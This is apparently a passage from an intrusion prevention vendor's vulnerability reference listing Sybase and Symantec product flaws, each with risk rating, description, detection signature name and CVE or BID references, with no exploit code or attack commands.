Description: A code execution vulnerability exists in Sybase Open Server. The vulnerability is due to an error in the processing of malformed login packets by the Backup Server (bcksrvr.exe) and Monitor Server (monsrvr.exe) components. Maliciously crafted packets could cause the service to call a function pointer from an attacker-controlled location. Successful exploitation of this vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on the target system in the context of the affected service, which is SYSTEM.
Situation: Generic_CS-Sybase-Open-Server-Function-Pointer-Array-Code-Execution
References:
BID-48934
http://www.securityfocus.com/bid/48934
OSVDB-74154
http://www.osvdb.org/74154
Back to top

Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption

About this vulnerability: A vulnerability in Sybase Open Server
Risk: High
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Open Server
Type: Malfunction
Description: A code execution vulnerability exists in Sybase Open Server. The vulnerability is due to an error in the processing of malformed login packets by the Backup Server (bcksrvr.exe) and Monitor Server (monsrvr.exe) components. Maliciously crafted packets can cause a single NULL byte to be written to an attacker-controlled location on the stack. Successful exploitation of this vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on the target system in the context of the affected service, which is SYSTEM.
Situation: Generic_CS-Sybase-Open-Server-Null-Byte-Stack-Memory-Corruption
References:
OSVDB-74155
http://www.osvdb.org/74155
Back to top

Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow

About this vulnerability: A vulnerability in Sybase MobiLink
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase MobiLink; Sybase SQL Anywhere Studio
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the MobiLink component of Sybase SQL Anywhere.
Situation: Generic_CS-Sybase-SQL-Anywhere-Mobilink-Crafted-Strings-Buffer-Overflow
References:
BID-27914
http://www.securityfocus.com/bid/27914
Back to top

Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Antivirus Corporate Edition
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Antivirus Corporate Edition; Symantec Quarantine Server; Symantec Systems Center
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Symantec Intel Alert Management System. The vulnerability is caused by code which copies a user supplied string into a stack buffer without proper bounds checks. The vulnerable code (contained in AMSLIB.dll) handles data sent to the msgsys.exe process which listens on port TCP/38292 by default. A remote unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to the affected service. Successful exploitation could result in arbitrary code execution in the SYSTEM context.
Situation: Generic_CS-Symantec-Alert-Management-System-Amssendalertack-Buffer-Overflow
References:
CVE-2010-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0110
BID-45936
http://www.securityfocus.com/bid/45936
Back to top

Symantec-Alert-Management-System-Arbitrary-Program-Execution

About this vulnerability: Symantec Alert Management System Intel File Transfer Service Arbitrary Program Execution
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Alert Management System; Symantec Antivirus Corporate Edition; Symantec Endpoint Protection
Type: Buffer Overflow
Description: A design error exists in Symantec Alert Management System Console component shipped with Symantec software. The vulnerability is due to a design error in XFR.EXE while transferring files to AMS2. This can be exploited by remote unauthenticated attackers to execute arbitrary code on the target host. Successful exploitation will lead to arbitrary files being executed within the context of System on the Windows platform. The behaviour of the target is entirely dependent on the code executed.
Situation: Generic_Symantec-Alert-Management-Arbitrary-Program-Execution
References:
CVE-2009-1431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1431
BID-34675
http://www.securityfocus.com/bid/34675
Back to top

Symantec-Alert-Management-System-HNDLRSVC-Command-Execution

About this vulnerability: A command execution vulnerability in Symantec Alert Management System service
Risk: Critical
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Symantec Client Security; Symantec Antivirus Corporate Edition; Symantec System Center
Type: Malfunction
Description: There is a command execution vulnerability in Symantec Alert Management System service. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted packet to the vulnerable service to execute arbitrary programs with the SYSTEM privileges.
Situation: Generic_CS-Symantec-Alert-Management-System-HNDLRSVC-Command-Execution
References:
BID-41959
http://www.securityfocus.com/bid/41959
Back to top

Symantec-Alert-Management-System-Intel-Alert-Originator-Service-Buffer-Overflow

About this vulnerability: Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
Risk: High
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Alert Management System
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Symantec Alert Originator Service component shipped with Symantec Client Security software. The vulnerability is due to a boundary error in iao.exe while copying user-provided data into memory. This can be exploited by remote unauthenticated attackers to inject and execute arbitrary code on the target host. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected process, which is SYSTEM on Windows platform.
Situation: Generic_Symantec-Alert-Management-System-Alert-Originator-Service-BOF
References:
CVE-2009-1430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1430
BID-34672
http://www.securityfocus.com/bid/34672
Back to top

Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Antivirus Corporate Edition
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Antivirus Corporate Edition; Symantec Quarantine Server; Symantec Systems Center
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Symantec Alert Management System. The vulnerability is caused by copying a user supplied modem string into a stack buffer without prior validation of its size. The vulnerability occurs in pagehndl.dll while processing data sent from the msgsys.exe process which listens by default on TCP port 38292. A remote, unauthenticated attacker could exploit this vulnerability by sending a specially crafted packet to the affected service. Successful exploitation could result in arbitrary code execution with SYSTEM privileges.
Situation: Generic_CS-Symantec-Alert-Management-System-Modem-String-Stack-Buffer-Overflow
References:
CVE-2010-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0110
BID-45936
http://www.securityfocus.com/bid/45936
Back to top

Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Antivirus Corporate Edition
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Antivirus Corporate Edition; Symantec Quarantine Server; Symantec Systems Center
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Symantec Alert Management System. The vulnerability is caused by code which copies a user supplied Pin Number into a stack buffer without prior validation of its size. The vulnerable code (contained in pagehndl.dll) handles data sent from the msgsys.exe process which listens on port TCP/38292 by default. A remote unauthenticated attacker could exploit this vulnerability by sending specially crafted input to the affected service. Successful exploitation could result in arbitrary code execution in the SYSTEM context.
Situation: Generic_CS-Symantec-Alert-Management-System-Pin-Number-Stack-Buffer-Overflow
References:
CVE-2010-0110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0110
BID-45936
http://www.securityfocus.com/bid/45936
Back to top

Symantec-Altiris-Deployment-Solution-ActiveX-File-Download

About this vulnerability: A vulnerability in Symantec Altiris Deployment Solution
Risk: High
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Altiris Deployment Solution
Type: Malfunction
Description: There is a vulnerability in an ActiveX component distributed with Symantec Altiris Deployment Solution. The vulnerable component is Altiris eXpress NS SC Download ActiveX control (AeXNSPkgDLLib.dll). The affected control contains certain unsafe methods that can allow a remote attacker to download and execute arbitrary programs on a vulnerable system by enticing a user to visit a crafted web page. In a successful attack where arbitrary code is downloaded and executed on the vulnerable target host, the behavior of the target system depends on the malicious code.
Situation: HTTP_SS-Symantec-Altiris-Deployment-Solution-ActiveX-File-Download
File-Text_Symantec-Altiris-Deployment-Solution-ActiveX-File-Download
References:
BID-36346
http://www.securityfocus.com/bid/36346
Back to top

Symantec-Altiris-DS-SQL-Injection

About this vulnerability: A Symantec Altiris DS SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003
Software: Symantec Altiris Deployment Solution
Type: SQL Injection
Description: A vulnerability in Symantec Altiris DS, versions 6.8.x and 6.9.x before 6.9.176, that allows remote attackers to execute arbitrary SQL commands via string fields in a notification packet.
Situation: Generic_CS-Symantec-Altiris-DS-SQL-Injection
References:
CVE-2008-2286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2286
BID-29198
http://www.securityfocus.com/bid/29198
OSVDB-45313
http://www.osvdb.org/45313
Back to top

Symantec-AMS2-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Symantec Alert Management System 2
Risk: High
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1781-5242
Platform: Windows
Software: Symantec Alert Management System 2
Type: Buffer Overflow
Description: A vulnerability in Symantec Alert Management System 2 (AMS2), as used in Symantec System Center (SSS); Symantec AntiVirus Server; Symantec AntiVirus Central Quarantine Server; Symantec AntiVirus (SAV) Corporate Edition 9 before 9.0 MR7, 10.0 and 10.1 before 10.1 MR8, and 10.2 before 10.2 MR2; Symantec Client Security (SCS) 2 before 2.0 MR7 and 3 before 3.1 MR8; and Symantec Endpoint Protection (SEP) before 11.0 MR3, allows remote attackers to execute arbitrary commands. via a crafted packet sent to TCP Port 12174 to pass the packet contents as an argument to CreateProcessA(). The resulting command will be executed with SYSTEM privileges.
Situation: Generic_Symantec-Alert-Management-System-Arbitrary-Remote-Command-Execution
Generic_Symantec-Alert-Management-System-Potential-Remote-Command-Execution
References:
CVE-2009-1429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1429
BID-34671
http://www.securityfocus.com/bid/34671
OSVDB-54157
http://www.osvdb.org/54157
Back to top

Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Antivirus
Risk: High
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Norton AntiVirus; Symantec Client Security
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in multiple Symantec products. The vulnerability is due to a lack of boundary checks in the Symantec Client Proxy ActiveX control (CLIproxy.dll). This vulnerability can allow remote attackers to execute arbitrary code on a target system by enticing a target user to open a maliciously crafted HTML document.
Situation: HTTP_SS-Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow
File-Text_Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow
References:
CVE-2010-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0108
BID-38222
http://www.securityfocus.com/bid/38222
Back to top

Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service

About this vulnerability: A vulnerability in Norton 360
Risk: Moderate
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Norton AntiVirus
Type: Malfunction
Description: Improper validation of file structures can cause a null pointer dereference, which results in a vulnerability which can be exploited to cause a denial of service condition on the target machine.
Situation: File-Exe_Symantec-AntiVirus-Engine-Decomposer-Mspack-Denial-Of-Service
References:
CVE-2016-2211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2211
Back to top

Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Symantec Anti Virus Engine
Risk: Moderate
First detected in: sgpkg-ips-811-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec AntiVirus Engine
Type: Malfunction
Description: Incorrect handling of portable executable files in the Symantec AntiVirus Engine results in a heap buffer overflow. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: File-Exe_Symantec-AntiVirus-Engine-PE-Header-Heap-Buffer-Overflow
References:
CVE-2016-2208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2208
Back to top

Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution

About this vulnerability: A vulnerability in Norton Security
Risk: Moderate
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Norton Internet Security
Type: Malfunction
Description: Incorrect validation of RAR files causes a remote code execution vulnerability in Norton Security. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: File-Binary_Symantec-AntiVirus-Engine-Rar-Decompression-Remote-Code-Execution
References:
CVE-2016-2207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2207
Back to top

Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Symantec's Antivirus Intel Alert Handler service
Risk: Moderate
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Symantec Client Security; Symantec Antivirus Corporate Edition; Symantec System Center
Type: Malfunction
Description: There is a denial of service vulnerability in Symantec's Antivirus Intel Alert Handler service. By sending malicious packets to the vulnerable service, a remote attacker can cause a denial of service condition.
Situation: Generic_CS-Symantec-AntiVirus-Intel-Alert-Handler-Service-Denial-Of-Service
References:
CVE-2010-3268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3268
BID-45368
http://www.securityfocus.com/bid/45368
OSVDB-70002
http://www.osvdb.org/70002
Back to top

Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow

About this vulnerability: Buffer overflow vulnerability in the Real-Time Scan Service component of various Symantec Antivirus products
Risk: High
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: Symantec Client Security; Symantec Antivirus Corporate Edition
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the Real-Time Scan Service component of various Symantec Antivirus products. When exploited succesfully, the vulnerability allows a remote attacker to cause a denial of service or execute arbitrary code with the privileges of the vulnerable process, normally System. The W32.Sagevo worm exploits this vulnerability.
Situation: Generic_Symantec-AntiVirus-Real-Time-Virus-Scan-Service-Stack-Overflow-Exploit
References:
CVE-2006-2630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2630
BID-18107
http://www.securityfocus.com/bid/18107
OSVDB-25846
http://www.osvdb.org/25846
Back to top

Symantec-AppStream-Client-LaunchObj-ActiveX-Control-Multiple-Weaknesses

About this vulnerability: A vulnerability in Symantec AppStream Client
Risk: High
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec AppStream Client
Type: Input Validation
Description: There is a remote code execution vulnerability in Symantec AppStream Client. The vulnerability is due to a lack of proper checks to validate if the server to which the client connects is valid and authorized. Remote unauthenticated attackers can exploit this vulnerability by masquerading as a valid server and enticing a client to open a crafted HTML file. Successful exploitation leads to arbitrary files being downloaded and executed within the context of the client. The behavior of the target is entirely dependent on the code executed.
Situation: HTTP_SS-Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call
File-Text_Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call
References:
CVE-2008-4388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4388
BID-33247
http://www.securityfocus.com/bid/33247
Back to top

Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation

About this vulnerability: A vulnerability in Symantec Antivirus Engine
Risk: Moderate
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec AntiVirus Engine
Type: Malfunction
Description: A vulnerability in the Symantec AntiVirus Engine can allow a remote attacker to execute arbitrary code on the affected system.
Situation: File-Binary_Symantec-AVE-Malformed-PE-Header-Memory-Access-Violation
References:
CVE-2016-2208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2208
BID-90653
http://www.securityfocus.com/bid/90653
Back to top

Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service

About this vulnerability: A Symantec Brightmail AntiSpam Nested Zip Handling Denial of Service vulnerability
Risk: High
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Brightmail AntiSpam
Type: Malfunction
Description: A vulnerability in Symantec Brightmail AntiSpam which allows remote attackers to cause a denial of service condition by sending a malicious zip file, due to the excessive amount of time in which the virus cleaner component takes to scan or clean messages with nested zip files.
Situation: SMTP_CS-Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service
File-Zip_Symantec-Brightmail-AntiSpam-Nested-Zip-Handling-Denial-of-Service
Back to top

Symantec-Discovery-XFERWAN-Service-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Symantec Discovery XFERWAN Service
Risk: High
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec Discovery
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Symantec Discovery XFERWAN Service. A remote unauthenticated attacker can send a crafted message with an excessively long string in the Message field to the Symantec Discovery XFERWAN Service to compromise the vulnerable system.
Situation: Generic_Symantec-Discovery-XFERWAN-Service-Buffer-Overflow
References:
CVE-2007-1173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1173
BID-24002
http://www.securityfocus.com/bid/24002
OSVDB-35076
http://www.osvdb.org/35076
Back to top

Symantec-DNS-Compression-DoS

About this vulnerability: A vulnerability in multiple Symantec products
Risk: High
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Norton Internet Security; Symantec Norton Personal Firewall; Symantec Client Firewall; Symantec Client Security; Symantec Norton AntiSpam
Type: Input Validation
Description: There is a denial of service vulnerability within multiple Symantec client security products. An attacker can craft a DNS packet that can cause the Symantec security products to enter an infinite loop, allowing an attacker to disable all access to the host running the vulnerable product.
Situation: Generic_UDP-Symantec-DNS-Compression-DoS
DNS-UDP_Symantec-DNS-Compression-DoS
References:
CVE-2004-0445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0445
BID-10336
http://www.securityfocus.com/bid/10336
OSVDB-6100
http://www.osvdb.org/6100
Back to top

Symantec-Encryption-Management-Server-Database-Backup-Command-Injection

About this vulnerability: A vulnerability in Symantec Encryption Management Server
Risk: High
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Encryption Management Server
Type: Input Validation
Description: A command injection vulnerability has been reported in Symantec Encryption Management Server. The vulnerability is due to insufficient sanitization of user supplied input when processing database backup commands from the Web UI. A remote authenticated attacker could exploit this vulnerability by sending a specially crafted request to the server web interface. Successful exploitation could lead to arbitrary command execution under the security context of the system user.
Situation: HTTP_CRL-Symantec-Encryption-Management-Server-Database-Backup-Command-Injection
References:
CVE-2014-7288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7288
BID-72308
http://www.securityfocus.com/bid/72308
OSVDB-117766
http://www.osvdb.org/117766
Back to top

Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass

About this vulnerability: A vulnerability in Symantec Endpoint Protection
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Endpoint Protection
Type: Malfunction
Description: An authentication bypass vulnerability exists in Symantec Endpoint Protection. This vulnerability is due to a design flaw that lets unauthenticated users to retrieve a valid session token. A remote, unauthenticated attacker may exploit this vulnerability to create an admin account and access the affected product on the target system.
Situation: HTTP_CRL-Symantec-Endpoint-Protection-Consoleservlet-Resetpassword-Policy-Bypass
References:
CVE-2015-1486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1486
BID-76074
http://www.securityfocus.com/bid/76074
Back to top

Symantec-Endpoint-Protection-Manager-Authentication-Bypass

About this vulnerability: A Symantec Endpoint Protection Manager vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Endpoint Protection Manager
Type: Input Validation
Description: A vulnerability in Symantec Endpoint Protection Manager, versions 12.1 before 12.1-RU6-MP1, which allows remote attackers to obtain administrator privileges via a crafted password-reset action that triggers a new administrative session, or via writing arbitrary files with a crafted file name. This covers CVE-2015-1486, CVE-2015-1487, and CVE-2015-1489.
Situation: HTTP_CSU-Symantec-Endpoint-Protection-Manager-Authentication-Bypass
References:
CVE-2015-1486
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1486
Back to top

Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Symantec Endpoint Protection
Risk: Moderate
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Endpoint Protection
Type: Input Validation
Description: Insufficient CSRF checks in Symantec Endpoint Protection result in a vulnerability that allows an attacker to appear to the server as a valid cliet.
Situation: HTTP_CS-Symantec-Endpoint-Protection-Manager-Cross-Site-Request-Forgery
References:
CVE-2016-3653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3653
Back to top

Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting

About this vulnerability: A vulnerability in Symantec Endpoint Protection Manager
Risk: Moderate
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Symantec Endpoint Protection Manager
Type: Input Validation
Description: Two reflected cross-site scripting vulnerabilities have been reported in Symantec Endpoint Protection Manager. The vulnerabilities are due to insufficient validation of user input before it is sent back to the user. A remote unauthenticated attacker may exploit these vulnerabilities to execute arbitrary script code in the context of the the current browser session.
Situation: HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting
References:
CVE-2014-3438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3438
BID-70844
http://www.securityfocus.com/bid/70844
OSVDB-114276
http://www.osvdb.org/114276
Back to top

Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652

About this vulnerability: A vulnerability in Symantec Endpoint Protection
Risk: Moderate
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Endpoint Protection
Type: Input Validation
Description: Insufficient validation of HTTP requests results in a cross-site scripting vulnerability in Symantec Endpoint Protection. A successful exploit allows an attacker to execute script code in the client browser.
Situation: HTTP_CRL-Symantec-Endpoint-Protection-Manager-Cross-Site-Scripting-CVE-2016-3652
References:
CVE-2016-3652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3652
Back to top

Symantec-Endpoint-Protection-Manager-Xml-External-Entity

About this vulnerability: A vulnerability in Symantec Endpoint Protection Manager
Risk: High
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Symantec Endpoint Protection Manager
Type: Malfunction
Description: A XML external entity (XXE) vulnerability exists in Symantec Endpoint Protection Manager (SEPM). This is due to an incorrectly configured XML parser in the management console that readily processes XML external entities. A remote unauthenticated attacker may exploit this vulnerability via specially crafted HTTP requests containing XML to bypass security policies, perform server-side request forgery (SSRF) and cause a denial of service condition.
Situation: HTTP_CS-Symantec-Endpoint-Protection-Manager-Xml-External-Entity
References:
CVE-2013-5014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5014
BID-65466
http://www.securityfocus.com/bid/65466
OSVDB-103305
http://www.osvdb.org/103305
Back to top

Symantec-Firewall-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in Symantec Firewall
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Gateway Security
Type: Insecure Configuration
Description: There are multiple vulnerabilities in the Symantec Enterprise Firewall/VPN Appliance and Symantec Gateway Security products. These products contain firmware flaws which result in improper enforcement of controls relative to incoming UDP traffic. These vulnerabilities enable an attacker to view and modify the firewall rules, and additionally to create a denial of service condition. The target system will not exhibit any unusual behaviour when the vulnerability is exploited for information disclosure. If these vulnerabilities are exploited to alter the configuration of the vulnerable system, this will result in a behavior change dependent on the new configuration settings. Alternatively, in the case of the denial-of-service attack previously described, the target system will become unresponsive until restarted.
Situation: SNMP-UDP_Symantec-Firewall-Multiple-Vulnerabilities
References:
CVE-2004-0369
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0369
BID-11039
http://www.securityfocus.com/bid/11039
Back to top

Symantec-Gateway-Products-DNS-Cache-Poisoning

About this vulnerability: A vulnerability in Symantec Gateway Security
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Gateway Security; Symantec Enterprise Firewall; Symantec VelociRaptor
Type: Dns Spoof
Description: There exists a vulnerability in the way the DNS proxy component of Symantec Gateway products processes and caches DNS responses. When the vulnerable component is configured to function as a DNS caching server or as a primary DNS server, it is suspectible to DNS cache poisoning under specific conditions. An attacker may exploit this vulnerability to do site spoofing, Man-in-the-Middle, or denial of service attacks by manipulating the DNS cache data on the target system.
Situation: DNS-TCP_Symantec-Gateway-Products-DNS-Cache-Poisoning
DNS-UDP_Symantec-Gateway-Products-DNS-Cache-Poisoning
References:
CVE-2005-0817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0817
BID-12818
http://www.securityfocus.com/bid/12818
Back to top

Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof

About this vulnerability: DNS cache poisoning vulnerability in Symantec Gateway products
Risk: Moderate
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec Enterprise Firewall; Symantec Gateway Security
Type: Dns Spoof
Description: Symantec Gateway Security product's DNS proxy (DNSd) is vulnerable to DNS cache spoofing. A remote attacker could create a malicious DNS server query response that contains authoritative or additional records resulting to the insertion of false DNS records into the DNS proxy cache.
Situation: DNS-UDP_Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof
References:
CVE-2004-1754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1754
BID-10557
http://www.securityfocus.com/bid/10557
OSVDB-7126
http://www.osvdb.org/7126
Back to top

Symantec-IM-Manager-Administrator-Console-Code-Injection

About this vulnerability: A vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec IM Manager
Type: Input Validation
Description: There is a code injection vulnerability in Symantec IM Manager Administrator console. The vulnerability is due to improper input validation that can lead to Javascript code injection and execution on the server. A remote attacker can exploit this vulnerability by enticing an authenticated user to visit a crafted web page. Successful exploitation will result in inject and execution of arbitrary code in the context of the Management Console.
Situation: HTTP_CRL-Symantec-IM-Manager-Administrator-Console-Code-Injection
Back to top

Symantec-IM-Manager-Administrator-Interface-SQL-Injection

About this vulnerability: A vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Symantec IM Manager
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Symantec IM Manager. The vulnerability is due to insufficient input validation in the Administrator Interface. A remote attacker can exploit this vulnerability by enticing an authenticated user to open a crafted web page. Successful exploitation will allow an attacker to execute SQL code on the underlying database of IM Manager.
Situation: HTTP_CRL-Symantec-IM-Manager-Administrator-Interface-SQL-Injection
References:
CVE-2011-0553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0553
BID-49738
http://www.securityfocus.com/bid/49738
Back to top

Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection

About this vulnerability: An SQL injection vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec IM Manager
Type: SQL Injection
Description: There is an SQL injection vulnerability in Symantec IM Manager. A remote unauthenticated attacker can send a malicious HTTP request to execute SQL statements on the vulnerable server, which can result in disclosure of sensitive information, data manipulation, or command execution.
Situation: HTTP_CRL-Symantec-IM-Manager-IMAdminReportTrendFormRun.asp-SQL-Injection
References:
CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112
BID-44299
http://www.securityfocus.com/bid/44299
OSVDB-68900
http://www.osvdb.org/68900
Back to top

Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection

About this vulnerability: An SQL injection vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec IM Manager
Type: SQL Injection
Description: There is an SQL injection vulnerability in Symantec IM Manager. A remote unauthenticated attacker can send a malicious HTTP request to execute SQL statements on the vulnerable server, which can result in disclosure of sensitive information, data manipulation, or command execution.
Situation: HTTP_CRL-Symantec-IM-Manager-IMAdminScheduleReport.asp-SQL-Injection
References:
CVE-2010-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0112
BID-44299
http://www.securityfocus.com/bid/44299
OSVDB-68898
http://www.osvdb.org/68898
Back to top

Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections

About this vulnerability: An SQL injection vulnerability in Symantec IM Manager
Risk: Moderate
First detected in: sgpkg-ips-365-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Symantec IM Manager
Type: SQL Injection
Description: There is an SQL injection vulnerability in Symantec IM Manager. A remote unauthenticated attacker can send a malicious HTTP request to execute SQL statements on the vulnerable server, which can result in disclosure of sensitive information, data manipulation, or command execution.
Situation: HTTP_CRL-Symantec-IM-Manager-LoggedInUsers.lgx-Definition-File-SQL-Injections
References:
CVE-2010-0112
